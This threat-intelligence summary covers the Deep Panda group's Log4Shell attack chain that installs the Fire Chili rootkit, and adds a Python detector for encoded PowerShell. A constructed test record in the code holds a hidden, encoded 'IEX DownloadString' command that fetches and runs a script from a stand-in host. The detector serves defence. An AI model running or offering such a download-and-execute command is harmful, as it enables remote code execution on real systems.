Deep Panda & Fire Chili Rootkits
Industry: Academic, Cosmetic, Financial, Travel | Level: Tactical | Source: Fortinet
Researchers at FortiGuard Labs have identified the Chinese APT group Deep Panda exploiting the Log4Shell vulnerability with a new digitally signed rootkit dubbed Fire Chili. The signing certificates were stolen from the game development companies Frostburn Studios and the Korean 433CCR Company. The attack chain begins with a Log4Shell exploit against a vulnerable VMware Horizon server, which spawns an encoded PowerShell command to download and execute scripts, and ends with a malicious DLL being installed. Persistence is achieved by creating a service and a registry entry. At the time of writing, the Fire Chili rootkit has a low detection score on VirusTotal.
- Anvilogic Scenario: Deep Panda - Fire Chili Threat Campaign - Initial Attack Stage
- Anvilogic Use Cases:
  - Potential CVE-2021-44228 - Log4Shell
  - Encoded PowerShell Command
  - Executable File Written to Disk
  - Download exe|msi|bat Proxy
  - Executable Create Script Process
  - Rare remote thread
  - Windows Service Created
  - Suspicious Registry Key Created
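The "Encoded PowerShell Command" stage of the chain above (a Horizon Java process spawning `powershell -enc ...` that downloads and runs a script) is the kind of event a detection engineer would want to decode and score. The following is an added example, not Fortinet's or Anvilogic's code; the process-creation records are constructed, and the parent image names `ws_TomcatService.exe` and `java.exe` are assumed stand-ins for the VMware Horizon Java service, not values from the page.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-and-execute primitives that the decoded script is checked for.
SUSPICIOUS = ("downloadstring", "downloadfile", "invoke-webrequest",
              "iex", "invoke-expression", "start-process", "rundll32")
# Assumed parent image names for a Horizon/Java host process (not from the page).
JAVA_PARENTS = {"ws_tomcatservice.exe", "java.exe"}


def decode_encoded_powershell(cmdline):
    """Return the decoded -enc payload (UTF-16LE text) or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(record):
    """Return a list of findings for one process-creation record."""
    findings = []
    decoded = decode_encoded_powershell(record["cmdline"])
    if decoded is None:
        return findings
    findings.append("encoded_powershell")
    hits = [k for k in SUSPICIOUS if k in decoded.lower()]
    if hits:
        findings.append("download_execute:" + ",".join(hits))
    if record["parent"].lower() in JAVA_PARENTS:
        findings.append("java_parent")
    return findings


def scan(events):
    """Map event index -> findings for every event that raised at least one."""
    return {i: f for i, e in enumerate(events) if (f := assess(e))}


def _enc(script):
    # Builds the constructed sample the same way -enc expects: base64 of UTF-16LE.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records: one mimicking the Log4Shell stage, one benign admin script.
SAMPLE_EVENTS = [
    {"parent": "ws_TomcatService.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]
```

Note that `-ExecutionPolicy` is not mistaken for `-e` because the pattern requires whitespace after the switch.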